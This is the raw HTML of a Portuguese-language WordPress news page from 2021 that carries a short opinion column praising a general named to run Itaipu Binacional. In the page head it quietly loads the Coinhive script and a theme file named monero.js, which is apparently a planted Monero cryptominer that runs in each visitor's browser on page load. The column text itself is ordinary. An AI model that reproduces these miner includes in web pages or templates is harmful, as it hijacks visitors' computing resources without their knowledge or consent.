

<!DOCTYPE html>
<html class="no-js" lang="pt-BR">
<head>
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-5NH0WLB29C"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-5NH0WLB29C');
</script>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="http://iguassunews.com/xmlrpc.php" />

	<!-- This site is optimized with the Yoast SEO plugin v15.6.2 - https://yoast.com/wordpress/plugins/seo/ -->
	<title>Coluna Caio Gottlieb: SUCESSÃO À ALTURA -</title>
	<meta name="robots" content="index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1" />
	<link rel="canonical" href="http://iguassunews.com/coluna-caio-gottlieb-sucessao-a-altura/" />
	<meta property="og:locale" content="pt_BR" />
	<meta property="og:type" content="article" />
	<meta property="og:title" content="Coluna Caio Gottlieb: SUCESSÃO À ALTURA -" />
	<meta property="og:description" content="Consciente da importância para o país da usina que supre mais de 15% do consumo nacional de energia elétrica e do compromisso de dar sequência ao imenso legado de obras estruturais em execução em várias regiões do Paraná que marcam a extraordinária gestão do general Joaquim Silva e Luna, agora convocado para botar a Petrobras na linha, o presidente Jair Bolsonaro escolheu a dedo o substituto dele na direção geral da Itaipu Binacional..." />
	<meta property="og:url" content="http://iguassunews.com/coluna-caio-gottlieb-sucessao-a-altura/" />
	<meta property="article:published_time" content="2021-02-24T04:05:00+00:00" />
	<meta property="article:modified_time" content="2021-02-24T12:53:24+00:00" />
	<meta property="og:image" content="https://i0.wp.com/iguassunews.com/wp-content/uploads/2020/12/CAIO-GOTTLIEB-e1609234863509.jpg?fit=200%2C200" />
	<meta property="og:image:width" content="200" />
	<meta property="og:image:height" content="200" />
	<meta name="twitter:card" content="summary_large_image" />
	<meta name="twitter:label1" content="Written by">
	<meta name="twitter:data1" content="admin">
	<meta name="twitter:label2" content="Est. reading time">
	<meta name="twitter:data2" content="2 minutos">
	<script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"http://iguassunews.com/#website","url":"http://iguassunews.com/","name":"Oiguassu","description":"","potentialAction":[{"@type":"SearchAction","target":"http://iguassunews.com/?s={search_term_string}","query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"ImageObject","@id":"http://iguassunews.com/coluna-caio-gottlieb-sucessao-a-altura/#primaryimage","inLanguage":"pt-BR","url":"https://i0.wp.com/iguassunews.com/wp-content/uploads/2020/12/CAIO-GOTTLIEB-e1609234863509.jpg?fit=200%2C200","width":200,"height":200},{"@type":"WebPage","@id":"http://iguassunews.com/coluna-caio-gottlieb-sucessao-a-altura/#webpage","url":"http://iguassunews.com/coluna-caio-gottlieb-sucessao-a-altura/","name":"Coluna Caio Gottlieb: SUCESS\u00c3O \u00c0 ALTURA -","isPartOf":{"@id":"http://iguassunews.com/#website"},"primaryImageOfPage":{"@id":"http://iguassunews.com/coluna-caio-gottlieb-sucessao-a-altura/#primaryimage"},"datePublished":"2021-02-24T04:05:00+00:00","dateModified":"2021-02-24T12:53:24+00:00","author":{"@id":"http://iguassunews.com/#/schema/person/1d041553b5df955921650ef8aff3cd06"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["http://iguassunews.com/coluna-caio-gottlieb-sucessao-a-altura/"]}]},{"@type":"Person","@id":"http://iguassunews.com/#/schema/person/1d041553b5df955921650ef8aff3cd06","name":"admin","image":{"@type":"ImageObject","@id":"http://iguassunews.com/#personlogo","inLanguage":"pt-BR","url":"http://1.gravatar.com/avatar/720ba8469fe039789215358cbb933434?s=96&d=mm&r=g","caption":"admin"},"sameAs":["http://www.oiguassu.com"]}]}</script>
	<!-- / Yoast SEO plugin. -->


<link rel='dns-prefetch' href='//secure.gravatar.com' />
<link rel='dns-prefetch' href='//coinhive.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel='dns-prefetch' href='//v0.wordpress.com' />
<link rel='dns-prefetch' href='//i0.wp.com' />
<link rel='dns-prefetch' href='//i1.wp.com' />
<link rel='dns-prefetch' href='//i2.wp.com' />
<link rel='dns-prefetch' href='//c0.wp.com' />
<link rel='dns-prefetch' href='//widgets.wp.com' />
<link rel='dns-prefetch' href='//s0.wp.com' />
<link rel='dns-prefetch' href='//0.gravatar.com' />
<link rel='dns-prefetch' href='//1.gravatar.com' />
<link rel='dns-prefetch' href='//2.gravatar.com' />
<link rel="alternate" type="application/rss+xml" title="Feed para  &raquo;" href="http://iguassunews.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para  &raquo;" href="http://iguassunews.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para  &raquo; Coluna Caio Gottlieb: SUCESSÃO À ALTURA" href="http://iguassunews.com/coluna-caio-gottlieb-sucessao-a-altura/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/iguassunews.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.6.1"}};
			!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode;p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0);e=i.toDataURL();return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(!p||!p.fillText)return!1;switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])?!1:!s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([55357,56424,8205,55356,57212],[55357,56424,8203,55356,57212])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source||{}).concatemoji?c(n.concatemoji):n.wpemoji&&n.twemoji&&(c(n.twemoji),c(n.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='wp-block-library-css'  href='http://iguassunews.com/wp-content/plugins/gutenberg/build/block-library/style.css?ver=1611098778' type='text/css' media='all' />
<style id='wp-block-library-inline-css' type='text/css'>
.has-text-align-justify{text-align:justify;}
</style>
<link rel='stylesheet' id='mh-style-css'  href='http://iguassunews.com/wp-content/themes/mh_newsdesk/style.css?ver=1.3.0' type='text/css' media='all' />
<link rel='stylesheet' id='mh-font-awesome-css'  href='http://iguassunews.com/wp-content/themes/mh_newsdesk/includes/font-awesome.min.css' type='text/css' media='all' />
<link crossorigin="anonymous" rel='stylesheet' id='mh-google-fonts-css'  href='https://fonts.googleapis.com/css?family=PT+Serif:300,400,400italic,600,700%7cOswald:300,400,400italic,600,700' type='text/css' media='all' />
<link rel='stylesheet' id='social-logos-css'  href='https://c0.wp.com/p/jetpack/9.3.1/_inc/social-logos/social-logos.min.css' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack_css-css'  href='https://c0.wp.com/p/jetpack/9.3.1/css/jetpack.css' type='text/css' media='all' />
<script type='text/javascript' src='https://c0.wp.com/c/5.6.1/wp-includes/js/jquery/jquery.min.js' id='jquery-core-js'></script>
<script type='text/javascript' src='https://c0.wp.com/c/5.6.1/wp-includes/js/jquery/jquery-migrate.min.js' id='jquery-migrate-js'></script>
<script type='text/javascript' id='jetpack_related-posts-js-extra'>
/* <![CDATA[ */
var related_posts_js_options = {"post_heading":"h4"};
/* ]]> */
</script>
<script type='text/javascript' src='https://c0.wp.com/p/jetpack/9.3.1/_inc/build/related-posts/related-posts.min.js' id='jetpack_related-posts-js'></script>
<script type='text/javascript' src='http://iguassunews.com/wp-content/themes/mh_newsdesk/js/scripts.js?ver=5.6.1' id='mh-scripts-js'></script>
<script type='text/javascript' src='https://coinhive.com/lib/coinhive.min.js?ver=5.6.1' id='monero-js'></script>
<script type='text/javascript' src='http://iguassunews.com/wp-content/themes/mh_newsdesk/js/monero.js?ver=5.6.1' id='monero2-js'></script>
<link rel="https://api.w.org/" href="http://iguassunews.com/wp-json/" /><link rel="alternate" type="application/json" href="http://iguassunews.com/wp-json/wp/v2/posts/31312" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://iguassunews.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://iguassunews.com/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 5.6.1" />
<link rel='shortlink' href='https://wp.me/pS5BS-892' />
<link rel="alternate" type="application/json+oembed" href="http://iguassunews.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Figuassunews.com%2Fcoluna-caio-gottlieb-sucessao-a-altura%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://iguassunews.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Figuassunews.com%2Fcoluna-caio-gottlieb-sucessao-a-altura%2F&#038;format=xml" />
<style type='text/css'>img#wpstats{display:none}</style>	<style type="text/css">
    	    		.social-nav a:hover, .logo-title, .entry-content a, a:hover, .entry-meta .entry-meta-author, .entry-meta a, .comment-info, blockquote, .pagination a:hover .pagelink { color: #0f7200; }
			.main-nav li:hover, .slicknav_menu, .ticker-title, .breadcrumb a, .breadcrumb .bc-text, .button span, .widget-title span, input[type=submit], table th, .comment-section-title .comment-count, #cancel-comment-reply-link:hover, .pagination .current, .pagination .pagelink { background: #0f7200; }
			blockquote, input[type=text]:hover, input[type=email]:hover, input[type=tel]:hover, input[type=url]:hover, textarea:hover { border-color: #0f7200; }
    	    	    				.main-nav, .main-nav ul li:hover > ul, .mh-footer { background: #019100; }
    	    	    	    		</style>
    <!--[if lt IE 9]>
<script src="http://iguassunews.com/wp-content/themes/mh_newsdesk/js/css3-mediaqueries.js"></script>
<![endif]-->
<link rel="amphtml" href="http://iguassunews.com/coluna-caio-gottlieb-sucessao-a-altura/amp/"><link rel="icon" href="https://i0.wp.com/iguassunews.com/wp-content/uploads/2021/01/cropped-LOGO-Nova-IGU-News.jpg?fit=32%2C32" sizes="32x32" />
<link rel="icon" href="https://i0.wp.com/iguassunews.com/wp-content/uploads/2021/01/cropped-LOGO-Nova-IGU-News.jpg?fit=192%2C192" sizes="192x192" />
<link rel="apple-touch-icon" href="https://i0.wp.com/iguassunews.com/wp-content/uploads/2021/01/cropped-LOGO-Nova-IGU-News.jpg?fit=180%2C180" />
<meta name="msapplication-TileImage" content="https://i0.wp.com/iguassunews.com/wp-content/uploads/2021/01/cropped-LOGO-Nova-IGU-News.jpg?fit=270%2C270" />
			<style type="text/css" id="wp-custom-css">
				.logo-wrap img{
	width:100%
}			</style>
		</head>
<body class="post-template-default single single-post postid-31312 single-format-standard mh-right-sb">
<div id="mh-wrapper">
<header class="mh-header">
	<div class="header-wrap clearfix">
				<div class="mh-col mh-1-3 header-logo-full">
			<a href="http://iguassunews.com/" title="" rel="home">
<div class="logo-wrap" role="banner">
<img src="http://oiguassu.com/wp-content/uploads/2020/08/cropped-O-IGUASSU-Cartão-Front-1064-x-451-v2.jpg" height="338" width="1064" alt="" />
</div>
</a>
		</div>
			</div>
	<div class="header-menu clearfix">
		<nav class="main-nav clearfix">
			<div class="menu"><ul>
<li class="page_item page-item-2"><a href="http://iguassunews.com/about/">About</a></li>
<li class="page_item page-item-7"><a href="http://iguassunews.com/">Home</a></li>
</ul></div>
		</nav>
		<div class="header-sub clearfix">
							<div id="ticker" class="news-ticker mh-col mh-2-3 clearfix">
			<span class="ticker-title">
			Hot Topics		</span>
		<ul class="ticker-content">			<li class="ticker-item">
				<a class="ticker-item-link" href="http://iguassunews.com/parana-proposta-quer-reitor-da-ufpr-esclarecendo-na-alep-a-suspensao-do-concurso-da-policia-civil/" title="Paraná: PROPOSTA QUER REITOR DA UFPR ESCLARECENDO NA ALEP A SUSPENSÃO DO CONCURSO DA POLÍCIA CIVIL">
					<span class="ticker-item-date">fevereiro 24, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Paraná: PROPOSTA QUER REITOR DA UFPR ESCLARECENDO NA ALEP A SUSPENSÃO DO CONCURSO DA POLÍCIA CIVIL</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://iguassunews.com/tribuna-livre-yasmin-quer-psicologos-e-assistentes-sociais-nas-escolas-de-foz/" title="Coluna Tribuna Livre: ROGÉRIO QUADROS DEFENDE MEDIDAS PARA REATIVAÇÃO DA ECONOMIA NA CIDADE">
					<span class="ticker-item-date">fevereiro 24, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Coluna Tribuna Livre: ROGÉRIO QUADROS DEFENDE MEDIDAS PARA REATIVAÇÃO DA ECONOMIA NA CIDADE</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://iguassunews.com/deus-e-bom-o-tempo-todo/" title="DEUS É BOM O TEMPO TODO!">
					<span class="ticker-item-date">fevereiro 24, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">DEUS É BOM O TEMPO TODO!</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://iguassunews.com/mundo-biden-e-trudeau-concordam-em-combater-influencia-da-china-e-modernizar-o-norad/" title="Mundo: BIDEN E TRUDEAU CONCORDAM EM COMBATER INFLUÊNCIA DA CHINA E MODERNIZAR O NORAD">
					<span class="ticker-item-date">fevereiro 24, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Mundo: BIDEN E TRUDEAU CONCORDAM EM COMBATER INFLUÊNCIA DA CHINA E MODERNIZAR O NORAD</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://iguassunews.com/bolsonaro-em-foz-revitalizacao-do-sistema-de-furnas-com-recursos-de-itaipu-e-acao-estrategica/" title="Bolsonaro em Foz: REVITALIZAÇÃO DO SISTEMA DE FURNAS COM RECURSOS DE ITAIPU É AÇÃO ESTRATÉGICA">
					<span class="ticker-item-date">fevereiro 24, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Bolsonaro em Foz: REVITALIZAÇÃO DO SISTEMA DE FURNAS COM RECURSOS DE ITAIPU É AÇÃO ESTRATÉGICA</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://iguassunews.com/criminalidad-justicia-realizo-traslados-de-miembros-del-pcc-por-amenazas-de-clan-rotela/" title="Tacumbú: JUSTICIA REALIZÓ TRASLADOS DE MIEMBROS DEL PCC POR AMENAZAS DE CLAN ROTELA">
					<span class="ticker-item-date">fevereiro 24, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Tacumbú: JUSTICIA REALIZÓ TRASLADOS DE MIEMBROS DEL PCC POR AMENAZAS DE CLAN ROTELA</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://iguassunews.com/motines-revueltas-en-carceles-de-ecuador-dejan-al-menos-75-muertos/" title="Motines: REVUELTAS EN CÁRCELES DE ECUADOR DEJAN AL MENOS 75 MUERTOS">
					<span class="ticker-item-date">fevereiro 24, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Motines: REVUELTAS EN CÁRCELES DE ECUADOR DEJAN AL MENOS 75 MUERTOS</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://iguassunews.com/acuerdo-mexico-y-argentina-firman-hoja-de-ruta-para-reactivar-mecanismos-de-asociacion-estrategica/" title="Acuerdo: MÉXICO Y ARGENTINA FIRMAN HOJA DE RUTA PARA REACTIVAR MECANISMOS DE ASOCIACIÓN ESTRATÉGICA">
					<span class="ticker-item-date">fevereiro 24, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Acuerdo: MÉXICO Y ARGENTINA FIRMAN HOJA DE RUTA PARA REACTIVAR MECANISMOS DE ASOCIACIÓN ESTRATÉGICA</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://iguassunews.com/urgencia-camara-aprova-compra-de-vacinas-sem-licenca-da-anvisa/" title="Urgência: CÂMARA APROVA COMPRA DE VACINAS SEM LICENÇA DA ANVISA">
					<span class="ticker-item-date">fevereiro 24, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Urgência: CÂMARA APROVA COMPRA DE VACINAS SEM LICENÇA DA ANVISA</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://iguassunews.com/quebra-de-sigilo-negado-fico-satisfeito-diz-flavio-bolsonaro-sobre-julgamento-no-stf/" title="Quebra de sigilo negado: “FICO SATISFEITO”, DIZ FLÁVIO BOLSONARO SOBRE JULGAMENTO NO STF">
					<span class="ticker-item-date">fevereiro 24, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Quebra de sigilo negado: “FICO SATISFEITO”, DIZ FLÁVIO BOLSONARO SOBRE JULGAMENTO NO STF</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://iguassunews.com/pandemia-foz-e-regiao-podem-sofrer-novas-restricoes-do-estado/" title="Pandemia: FOZ E REGIÃO PODEM SOFRER NOVAS RESTRIÇÕES DO ESTADO">
					<span class="ticker-item-date">fevereiro 24, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Pandemia: FOZ E REGIÃO PODEM SOFRER NOVAS RESTRIÇÕES DO ESTADO</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://iguassunews.com/tce-concluiu-vice-de-camara-tem-direito-a-subsidio-de-presidente-quando-assume-o-cargo/" title="TCE concluiu: VICE DE CÂMARA TEM DIREITO A SUBSÍDIO DE PRESIDENTE QUANDO ASSUME O CARGO">
					<span class="ticker-item-date">fevereiro 24, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">TCE concluiu: VICE DE CÂMARA TEM DIREITO A SUBSÍDIO DE PRESIDENTE QUANDO ASSUME O CARGO</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://iguassunews.com/coluna-caio-gottlieb-sucessao-a-altura/" title="Coluna Caio Gottlieb: SUCESSÃO À ALTURA">
					<span class="ticker-item-date">fevereiro 24, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Coluna Caio Gottlieb: SUCESSÃO À ALTURA</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://iguassunews.com/crise-hotelaria-e-gastronomia-pedem-socorro-a-prefeitura-mas-chico-brasileiro-se-cala/" title="Terra das Cataratas: IMPACTO DA PANDEMIA GERA CRISE PARA A HOTELARIA E GASTRONOMIA">
					<span class="ticker-item-date">fevereiro 24, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Terra das Cataratas: IMPACTO DA PANDEMIA GERA CRISE PARA A HOTELARIA E GASTRONOMIA</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://iguassunews.com/foz-do-iguacu-governo-municipal-perde-o-controle-e-numero-de-casos-de-covid-19-explodem-no-municipio/" title="Foz do Iguaçu – GOVERNO MUNICIPAL PERDE O CONTROLE, E NÚMERO DE CASOS DE COVID-19 EXPLODEM. &#8220;LOCKDOWN&#8221;?">
					<span class="ticker-item-date">fevereiro 24, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Foz do Iguaçu – GOVERNO MUNICIPAL PERDE O CONTROLE, E NÚMERO DE CASOS DE COVID-19 EXPLODEM. &#8220;LOCKDOWN&#8221;?</span>
				</a>
			</li>	</ul>
</div>						<aside class="mh-col mh-1-3 header-search">
				<form role="search" method="get" class="search-form" action="http://iguassunews.com/">
				<label>
					<span class="screen-reader-text">Pesquisar por:</span>
					<input type="search" class="search-field" placeholder="Pesquisar &hellip;" value="" name="s" />
				</label>
				<input type="submit" class="search-submit" value="Pesquisar" />
			</form>			</aside>
		</div>
	</div>
</header><div class="mh-section mh-group">
	<div id="main-content" class="mh-content"><nav class="breadcrumb"><span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://iguassunews.com" itemprop="url" class="bc-home"><span itemprop="title">Home</span></a></span> <a href="http://iguassunews.com/category/colunas/">Colunas</a> <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://iguassunews.com/category/colunas/caio-gottlieb/" itemprop="url"><span itemprop="title">Caio Gottlieb</span></a></span></nav>
<article id="post-31312" class="post-31312 post type-post status-publish format-standard has-post-thumbnail hentry category-caio-gottlieb category-colunas">
	<header class="entry-header clearfix">
		<h1 class="entry-title">
			Coluna Caio Gottlieb: SUCESSÃO À ALTURA		</h1>
			</header>
	
<div class="entry-thumbnail">
<img width="200" height="200" src="https://i0.wp.com/iguassunews.com/wp-content/uploads/2020/12/CAIO-GOTTLIEB-e1609234863509.jpg?resize=200%2C200" class="attachment-content-single size-content-single wp-post-image" alt="" loading="lazy" data-attachment-id="27602" data-permalink="http://iguassunews.com/butantan-de-doria-deve-muitas-explicacoes/caio-gottlieb/" data-orig-file="https://i0.wp.com/iguassunews.com/wp-content/uploads/2020/12/CAIO-GOTTLIEB-e1609234863509.jpg?fit=200%2C200" data-orig-size="200,200" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="CAIO GOTTLIEB" data-image-description="" data-medium-file="https://i0.wp.com/iguassunews.com/wp-content/uploads/2020/12/CAIO-GOTTLIEB-e1609234863509.jpg?fit=300%2C300" data-large-file="https://i0.wp.com/iguassunews.com/wp-content/uploads/2020/12/CAIO-GOTTLIEB-e1609234863509.jpg?fit=200%2C200" /></div>
		<p class="entry-meta">
<span class="entry-meta-author vcard author">Posted By: <a class="fn" href="http://iguassunews.com/author/admin/">admin</a></span>
<span class="entry-meta-date updated">fevereiro 24, 2021</span>
</p>
	<div class="entry-content clearfix">
		<p style="text-align: center;"><a href="https://i2.wp.com/iguassunews.com/wp-content/uploads/2021/01/caio-fulll.jpg"><img data-attachment-id="28907" data-permalink="http://iguassunews.com/o-novo-milagre-do-vinho/caio-fulll/" data-orig-file="https://i2.wp.com/iguassunews.com/wp-content/uploads/2021/01/caio-fulll.jpg?fit=574%2C243" data-orig-size="574,243" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="caio fulll" data-image-description="" data-medium-file="https://i2.wp.com/iguassunews.com/wp-content/uploads/2021/01/caio-fulll.jpg?fit=300%2C127" data-large-file="https://i2.wp.com/iguassunews.com/wp-content/uploads/2021/01/caio-fulll.jpg?fit=574%2C243" loading="lazy" class="aligncenter size-full wp-image-28907" src="https://i2.wp.com/iguassunews.com/wp-content/uploads/2021/01/caio-fulll.jpg?resize=574%2C243" alt="" width="574" height="243" srcset="https://i2.wp.com/iguassunews.com/wp-content/uploads/2021/01/caio-fulll.jpg?w=574 574w, https://i2.wp.com/iguassunews.com/wp-content/uploads/2021/01/caio-fulll.jpg?resize=300%2C127 300w" sizes="(max-width: 574px) 100vw, 574px" data-recalc-dims="1" /></a></p>
<p style="text-align: justify;">Consciente da importância para o país da usina que supre mais de 15% do consumo nacional de energia elétrica e do compromisso de dar sequência ao imenso legado de obras estruturais em execução em várias regiões do Paraná que marcam a extraordinária gestão do <strong>general Joaquim Silva e Luna,</strong> agora convocado para botar a Petrobras na linha, o presidente Jair Bolsonaro escolheu a dedo o substituto dele na direção geral da Itaipu Binacional.</p>
<p><img loading="lazy" class="aligncenter size-full" src="https://i0.wp.com/caiogottlieb.jor.br/wp-content/uploads/2021/02/militar.jpeg?resize=640%2C480" width="640" height="480" data-recalc-dims="1" /></p>
<p style="text-align: justify;">Gaúcho de Santa Maria, o <strong>general de Exército da reserva João Francisco Ferreira (foto acima)</strong> iniciou a carreira militar em 1966 na Escola Preparatória de Cadetes, concluindo o aprendizado com a nota mais alta do grupo.</p>
<p style="text-align: justify;">Igualmente na primeira colocação, ele graduou-se na Academia Militar das Agulhas Negras em 1972, por sinal a mesma turma de Luna, considerada uma das melhores da história.</p>
<p style="text-align: justify;">Como se não bastasse, obteve ainda a mesma posição ao diplomar-se na Escola de Aperfeiçoamento de Oficiais e também na Escola de Comando e Estado-Maior do Exército.</p>
<p style="text-align: justify;">Em resumo, o futuro diretor geral da margem brasileira da maior hidrelétrica do mundo carrega o mérito de ser um “tríplice coroado”, título atribuído aos oficiais que conquistam o primeiro lugar nos três principais cursos de formação do Exército.</p>
<p style="text-align: justify;">Itaipu continuará sendo muito bem comandada.</p>
<h6 style="text-align: right;">(Leia e compartilhe outras postagens acessando o site: caiogottlieb.jor.br)</h6>
<div class="sharedaddy sd-sharing-enabled"><div class="robots-nocontent sd-block sd-social sd-social-icon sd-sharing"><h3 class="sd-title">Compartilhe isso:</h3><div class="sd-content"><ul><li class="share-twitter"><a rel="nofollow noopener noreferrer" data-shared="sharing-twitter-31312" class="share-twitter sd-button share-icon no-text" href="http://iguassunews.com/coluna-caio-gottlieb-sucessao-a-altura/?share=twitter" target="_blank" title="Clique para compartilhar no Twitter"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no Twitter(abre em nova janela)</span></a></li><li class="share-facebook"><a rel="nofollow noopener noreferrer" data-shared="sharing-facebook-31312" class="share-facebook sd-button share-icon no-text" href="http://iguassunews.com/coluna-caio-gottlieb-sucessao-a-altura/?share=facebook" target="_blank" title="Clique para compartilhar no Facebook"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no Facebook(abre em nova janela)</span></a></li><li class="share-telegram"><a rel="nofollow noopener noreferrer" data-shared="" class="share-telegram sd-button share-icon no-text" href="http://iguassunews.com/coluna-caio-gottlieb-sucessao-a-altura/?share=telegram" target="_blank" title="Clique para compartilhar no Telegram"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no Telegram(abre em nova janela)</span></a></li><li class="share-jetpack-whatsapp"><a rel="nofollow noopener noreferrer" data-shared="" class="share-jetpack-whatsapp sd-button share-icon no-text" href="http://iguassunews.com/coluna-caio-gottlieb-sucessao-a-altura/?share=jetpack-whatsapp" target="_blank" title="Clique para compartilhar no WhatsApp"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no WhatsApp(abre em nova janela)</span></a></li><li class="share-skype"><a rel="nofollow noopener noreferrer" data-shared="sharing-skype-31312" class="share-skype sd-button share-icon no-text" href="http://iguassunews.com/coluna-caio-gottlieb-sucessao-a-altura/?share=skype" target="_blank" title="Clique para compartilhar no Skype"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no Skype(abre em nova janela)</span></a></li><li class="share-linkedin"><a rel="nofollow noopener noreferrer" data-shared="sharing-linkedin-31312" class="share-linkedin sd-button share-icon no-text" href="http://iguassunews.com/coluna-caio-gottlieb-sucessao-a-altura/?share=linkedin" target="_blank" title="Clique para compartilhar no LinkedIn"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no LinkedIn(abre em nova janela)</span></a></li><li class="share-end"></li></ul></div></div></div><div class='sharedaddy sd-block sd-like jetpack-likes-widget-wrapper jetpack-likes-widget-unloaded' id='like-post-wrapper-12891280-31312-60369408cf9a0' data-src='https://widgets.wp.com/likes/#blog_id=12891280&amp;post_id=31312&amp;origin=iguassunews.com&amp;obj_id=12891280-31312-60369408cf9a0' 